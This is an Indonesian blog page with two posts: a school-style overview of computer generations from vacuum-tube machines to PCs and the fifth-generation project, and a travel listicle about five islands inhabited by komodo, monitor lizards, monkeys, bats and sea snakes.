1. Komputer Generasi Pertama (1946­ – 1959)


Dengan terjadinya Perang Dunia II, negara­negara yang terlibat dalam perang tersebut berusaha mengembangkan untuk mengeksploit potensi strategis yang dimiliki komputer.

Hal ini meningkatkan pendanaan pengembangan komputer serta mempercepat kemajuan teknik komputer.

(1) Colassus

(2) Mark I

(3) ENIAC

(4) EDVAC

(5) UNIVAC I

Ciri komputer generasi pertama adalah:

- Penggunaan tube vakum (yang membuat komputer pada masa tersebut berukuran sangat besar)

- Adanya silinder magnetik untuk penyimpanan data.

- Instruksi operasi dibuat secara spesifik untuk suatu tugas tertentu.

- Setiap komputer memiliki program kode­biner yang berbeda yang disebut “bahasa mesin” (machine language). Hal ini menyebabkan komputer sulit untuk diprogram dan membatasi kecepatannya.


2. Komputer Generasi Kedua (1959­ – 1964)


Stretch dan LARC


Mesin pertama yang memanfaatkan teknologi baru ini adalah superkomputer. IBM membuat superkomputer bernama Stretch, dan Sprery­ Rand membuat komputer bernama LARC. Komputer­komputer ini,yang dikembangkan untuk laboratorium energi atom, dapat menangani sejumlah besar data, sebuah kemampuan yang sangat dibutuhkan oleh peneliti atom. Mesin tersebut sangat mahal dan cenderung terlalu kompleks untuk kebutuhan komputasi bisnis, sehingga membatasi kepopulerannya.

Hanya ada dua LARC yang pernah dipasang dan digunakan: satu di Lawrence Radiation Labs di Livermore, California, dan yang lainnya di US Navy Research and Development Center di Washington D.C. Komputer generasi kedua menggantikan bahasa mesin dengan bahasa assembly. Bahasa assembly adalah bahasa yang menggunakan singkatan­singakatan untuk menggantikan kode biner.


Pada awal 1960­an, mulai bermunculan komputer generasi kedua yang sukses di bidang bisnis, di universitas, dan di pemerintahan. Komputer generasi kedua ini merupakan komputer yang sepenuhnya menggunakan transistor. Mereka juga memiliki komponen­komponen yang dapat diasosiasikan dengan komputer pada saat ini: printer, penyimpanan dalam disket, memory, sistem operasi, dan program.


Ciri-ciri komputer pada generasi kedua:


- Penggunaan transistor sehingga ukurannya lebih kecil

- Adanya pengembangan memori inti­magnetik membantu pengembangan komputer generasi kedua yang lebih kecil, lebih cepat, lebih dapat diandalkan, dan lebih hemat energi dibanding para pendahulunya

- Penggantian dari bahasa mesin menjadi bahasa Asembly

- Muncul bahasa pemrograman COBOL dan FORTRAN


3. Komputer Generasi Ketiga (1964­ – 1970)


Walaupun transistor dalam banyak hal mengungguli tube vakum, namun transistor menghasilkan panas yang cukup besar, yang dapat berpotensi merusak bagian­bagian internal komputer. Batu kuarsa (quartz rock) menghilangkan masalah ini. Jack Kilby, seorang insinyur di Texas Instrument, mengembangkan sirkuit terintegrasi (IC : integrated circuit) di tahun 1958. IC mengkombinasikan tiga komponen elektronik dalam sebuah piringan silikon kecil yang terbuat dari pasir kuarsa.


Pada ilmuwan kemudian berhasil memasukkan lebih banyak komponen­komponen ke dalam suatu chiptunggal yang disebut semikonduktor. Hasilnya, komputer menjadi semakin kecil karena komponen­komponen dapat dipadatkan dalam chip. Kemajuan komputer generasi ketiga lainnya adalah penggunaan system operasi (operating system) yang memungkinkan mesin untuk menjalankan berbagai program yang berbeda secara serentak dengan sebuah program utama yang memonitor dan mengkoordinasi memori komputer.

Ciri-ciri komputer pada generasi ketiga:


- Penggunaan IC(Intregrated Circuit)

- Ukuran komputer menjadi lebih kecil

- Ditemukannya Sistem Operasi


4. Komputer Generasi Keempat (1979­ – sekarang)


Setelah IC, tujuan pengembangan menjadi lebih jelas: mengecilkan ukuran sirkuit dan komponen­komponen elektrik. Large Scale Integration (LSI) dapat memuat ratusan komponen dalam sebuah chip. Pada tahun 1980­ an, Very Large Scale Integration (VLSI) memuat ribuan komponen dalam sebuah chip tunggal. Ultra­Large Scale Integration (ULSI) meningkatkan jumlah tersebut menjadi jutaan. Kemampuan untuk memasang sedemikian banyak komponen dalam suatu keping yang berukurang setengah keping uang logam mendorong turunnya harga dan ukuran komputer. Hal tersebut juga meningkatkan daya kerja, efisiensi dan keterandalan komputer.


Chip Intel 4004 yang dibuat pada tahun 1971 membawa kemajuan pada IC dengan meletakkan seluruh komponen dari sebuah komputer (central processing unit, memori, dan kendali input/output) dalam sebuah chip yang sangat kecil. Sebelumnya, IC dibuat untuk mengerjakan suatu tugas tertentu yang spesifik. Sekarang, sebuah mikroprosesor dapat diproduksi dan kemudian diprogram untuk memenuhi seluruh kebutuhan yang diinginkan. Tidak lama kemudian, setiap perangkat rumah tangga seperti microwave oven, televisi, dan mobil dengan electronic fuel injection dilengkapi dengan mikroprosesor.


Perkembangan yang demikian memungkinkan orang­orang biasa untuk menggunakan komputer biasa. Komputer tidak lagi menjadi dominasi perusahaan­perusahaan besar atau lembaga pemerintah. Pada pertengahantahun 1970­an, perakit komputer menawarkan produk komputer mereka ke masyarakat umum. Komputer­komputer ini, yang disebut minikomputer, dijual dengan paket piranti lunak yang mudah digunakan oleh kalangan awam. Piranti lunak yang paling populer pada saat itu adalah program word processing dan spreadsheet. Pada awal 1980­an, video game seperti Atari 2600 menarik perhatian konsumen pada komputer rumahan yang lebih canggih dan dapat diprogram.


Pada tahun 1981, IBM memperkenalkan penggunaan Personal Computer (PC) untuk penggunaan di rumah, kantor, dan sekolah. Jumlah PC yang digunakan melonjak dari 2 juta unit di tahun 1981 menjadi 5,5 juta unit di tahun 1982. Sepuluh tahun kemudian, 65 juta PC digunakan. Komputer melanjutkan evolusinya menuju ukuran yang lebih kecil, dari komputer yang berada di atas meja (desktop computer) menjadi komputer yang dapat dimasukkan ke dalam tas (laptop), atau bahkan komputer yang dapat digenggam (palmtop).


IBM PC bersaing dengan Apple Macintosh dalam memperebutkan pasar komputer. Apple Macintosh menjadi terkenal karena mempopulerkan system grafis pada komputernya, sementara saingannya masih menggunakan komputer yang berbasis teks. Macintosh juga mempopulerkan penggunaan piranti mouse.


Pada masa sekarang, kita mengenal perjalanan IBM compatible dengan pemakaian CPU: IBM PC/486, Pentium, Pentium II, Pentium III, Pentium IV (Serial dari CPU buatan Intel). Juga kita kenal AMD k6, Athlon, dsb. Ini semua masuk dalam golongan komputer generasi keempat. Seiring dengan menjamurnya penggunaan komputer di tempat kerja, cara­ cara baru untuk menggali potensial terus dikembangkan. Seiring dengan bertambah kuatnya suatu komputer kecil, komputer­komputer tersebut dapat dihubungkan secara bersamaan dalam suatu jaringan untuk saling berbagi memori, piranti lunak, informasi, dan juga untuk dapat saling berkomunikasi satu dengan yang lainnya. Komputer jaringan memungkinkan komputer tunggal untuk membentuk kerjasama elektronik untuk menyelesaikan suatu proses tugas. Dengan menggunakan perkabelan langsung (disebut juga local area network, LAN), atau kabel telepon, jaringan ini dapat berkembang menjadi sangat besar.


Ciri-ciri komputer pada generasi keempat:

• Digunakannya LSI, VLSI, ULSI

• Digunakannya mikroprosesor


Banyak kemajuan di bidang disain komputer dan teknologi semakin memungkinkan pembuatan komputer generasi kelima. Dua kemajuan rekayasa yang terutama adalah kemampuan pemrosesan paralel, yang akan menggantikan model von Neumann. Model von Neumann akan digantikan dengan sistem yang mampu mengkoordinasikan banyak CPU untuk bekerja secara serempak. Kemajuan lain adalah teknologi superkonduktor yang memungkinkan aliran elektrik tanpa ada hambatan apapun, yang nantinya dapat mempercepat kecepatan informasi.


Jepang adalah negara yang terkenal dalam sosialisasi jargon dan proyek komputer generasi kelima. Lembaga ICOT (Institute for new Computer Technology) juga dibentuk untuk merealisasikannya. Banyak kabar yang menyatakan bahwa proyek ini telah gagal, namun beberapa informasi lain bahwa keberhasilan proyek komputer generasi kelima ini akan membawa perubahan baru paradigma komputerisasi di dunia. Kita tunggu informasi mana yang lebih valid dan membuahkan hasil.
[Read More...]


5 Pulau di Indonesia Ini Penghuninya Bukan Manusia!



Indonesia punya 5 pulau yang menjadi habitat beberapa macam satwa. Pulau-pulau tersebut pun diberi nama sesuai dengan satwa yang menjadi penghuninya. Selain keunikannya sebagai rumah bagi
para satwa, alamnya juga
menarik untuk dijelajahi. Anda bisa trekking membelah hutannya hingga menyelami perairan yang sangat jernih.

Disusun detikTravel, Selasa (9/10/2012), berikut 5 pulau di Indonesia yang dihuni oleh satwa:

1. Pulau Rinca, NTT
Dengan waktu sekitar 2 jam perjalanan laut dari Labuan Bajo, Anda akan tiba di Pulau Rinca, Flores Barat, NTT. Mayoritas yang tinggal di pulau ini adalah komodo. Ada lebih banyak komodo di Pulau Rinca daripada di Pulau Komodo!

Trekking menjelajahi savana dan perbukitannya menjadi kegiatan favorit traveler di sana. Sebabnya, saat itulah Anda akan bertemu Sang Naga Purba yang sedang berjalan atau sekedar diam. Tidak sulit untuk menemukan komodo di pulau ini. Dari bukit hingga di pantainya, hewan ini bebas berkeliaran ke mana saja.

Peraturan penting di pulau ini adalah wisatawan harus terus bersama ranger atau pemandu. Jangan pernah jauh dan taati setiap peraturan yang diberikan ranger saat perjalanan. Selain itu, wanita yang sedang haid dilarang menginjakan kaki di pulau ini. Sebabnya, penciuman komodo sangat tajam dan berpotensi untuk menyerang. Hii!

2. Pulau Biawak, Jawa Barat
Kalau NTT punya pulau berisi komodo, beda lagi dengan Pulau Biawak di Indramayu, Jawa Barat. Sesuai dengan namanya, pulau ini menjadi habitat bagi banyak biawak. Dengan hutan bakau di tengah pulaunya, tak heran banyak biawak yang menempati pulai
ini. Ukurannya pun beragam, ada yang kecil, sedang, hingga besar. Wuih!

Dari Pelabuhan Indramayu, dibutuhkan 4-5 jam untuk menuju pulau yang menjadi rumah bagi biawak ini. Anda akan melihat reptil ini berkeliaran di pinggir pantai, di tengah hutan, hingga di perairannya. Anda harus tetap
waspada saat bertemu hewan ini, meski mereka tidak agresif. Anda harus waspada terhadap sabetan ekornya!

Pulau Biawak juga memiliki alam yang eksotis. Perairan yang jernih di sekitarnya akan menggoda Anda untuk menyelam. Berbagai macam ikan laut dan karang-karang cantik akan Anda temukan di bawah airnya. Tidak ada manusia yang tinggal di pulau ini, hanya ada beberapa pemandu setempat. Anda pun bisa menyewa bungalow untuk bermalam di sana. Berminat?
 
3. Pulau Kembang, Kalimantan Selatan
Pulau Kembang terletak di tengah Sungai Barito, Banjarmasin, Kalsel. Meski berada di tengah sungai, pulau ini justru dihuni oleh ratusan monye
t ekor panjang. Hutan rimbun dengan pepohonan tinggi menjulang menjadi rumah yang nyaman untuk satwa jenaka tersebut.

Dari pinggir dermaga, Anda akan melihat monyet-monyet yang sedang menunggu wisatawan datang. Memang, biasanya wisatawan yang datang ke sini selalu membawa makanan berupa pisang atau lainnya untuk hewan tesebut. Para monyet pun akan dengan sigap mengambil makanan dari tangan Anda. Monyet-monyet
di sini tidak usil, tapi pastikan barang-barang berharga Anda tersimpan dengan benar di dalam tas.

Tingkah jenaka para monyet menjadi suguhan untuk wisatawan. Anda dapat melihat mereka yang sedang memanjat di pohon, menggendong anak, hingga bertengkar satu sama lain. Beberapa monyet pun akan memanjat ke bahu Anda. Akan tetapi, ada baiknya Anda tidak memasuki ke bagian hutan yang lebih dalam. Sebabnya, di sana lebih banyak monyet dan ukurannya pun lebih besar. Hii!

4. Pulau Kalong, NTT (gambar)
Selain Pulau Rinca dan Pulau Komodo, ada satu lagi pulau di NTT yang dihuni oleh satwa. Terletak sekitar satu jam dari Labuan Bajo, Pulau Kalong menjadi rumah bagi ribuan kalong. Mereka bergelantungan di tiap pohon- pohon di hutan bakaunya dan terbang bersamaan saat hari memasuki malam.

Ups, ternyata wisatawan dilarang masuk ke dalam pulau ini. Sebabnya, Pulau Kalong juga menjadi rumah bagi banyak ular phyton atau sanca. Masyarakat setempat pun tidak ada yang berani masuk ke pulau ini. Meraka percaya, jika sekali masuk ke dalam pulau ini, maka akan sulit untuk keluar kembali.

Meski demikian, pulau ini juga mencuri hati traveler. Pukul 18.00-19.00 WITA adalah waktu yang terbaik untuk berhenti di depan pulaunya. Dari sana, ada ribuan kelelawar yang keluar dari pulaunya untuk menuju Pulau Flores. Pemandangan langit senja berwarna oranye dihiasi oleh kelelawar pun akan membuat siapa saja terkesima. Anda seolah sedang berada di sarang Batman!

5. Pulau Ular, NTB
Sesuai dengan namanya, pulau ini dipenuhi ratusan bahkan ribuan ular laut. Bayangkan saja, di pulau ini masih terdapat ratusan ular yang hidup di alam bebas tanpa pengamanan apapun!

Jangan takut! Konon, ular-ular di pulau ini sangatlah jinak. Tidak pernah sekali pun ada wisatawan yang terluka karena ular-ular di pulau ini. Ular-ular yang mendiami pulau
ini sangat unik dan bersahabat dengan wisatawan. Tentu, berwisata ke pulau ini akan sangat menegangkan sekaligus menyenangkan.

Pulau Ular termasuk dalam daerah Pantai Oi Caba, NTB. Pulau ini pun menjadi daya tarik bagi wisatawan. Di sini traveler bisa memegang, berfoto, dan bermain dengan ratusan bahkan ribuan ular yang hidup di pulau ini. Kulitnya yang berwarna putih, perak dan hitam terlihat mengkilap karena tertimpa cahaya matahari. Berani?

Kelima pulau tersebut dapat menjadi destinasi perjalanan Anda selanjutnya. Ada rasa penasaran, eksotisme alam yang masih perawan, hingga jantung yang berdetak kencang saat melihat satwa tersebut dari dekat.
[Read More...]


 
English
Japanese
Korean
Arabic
Chinese Simplified

Buku Tamu
Return to top of page Copyright © 2012 Adhi Blog™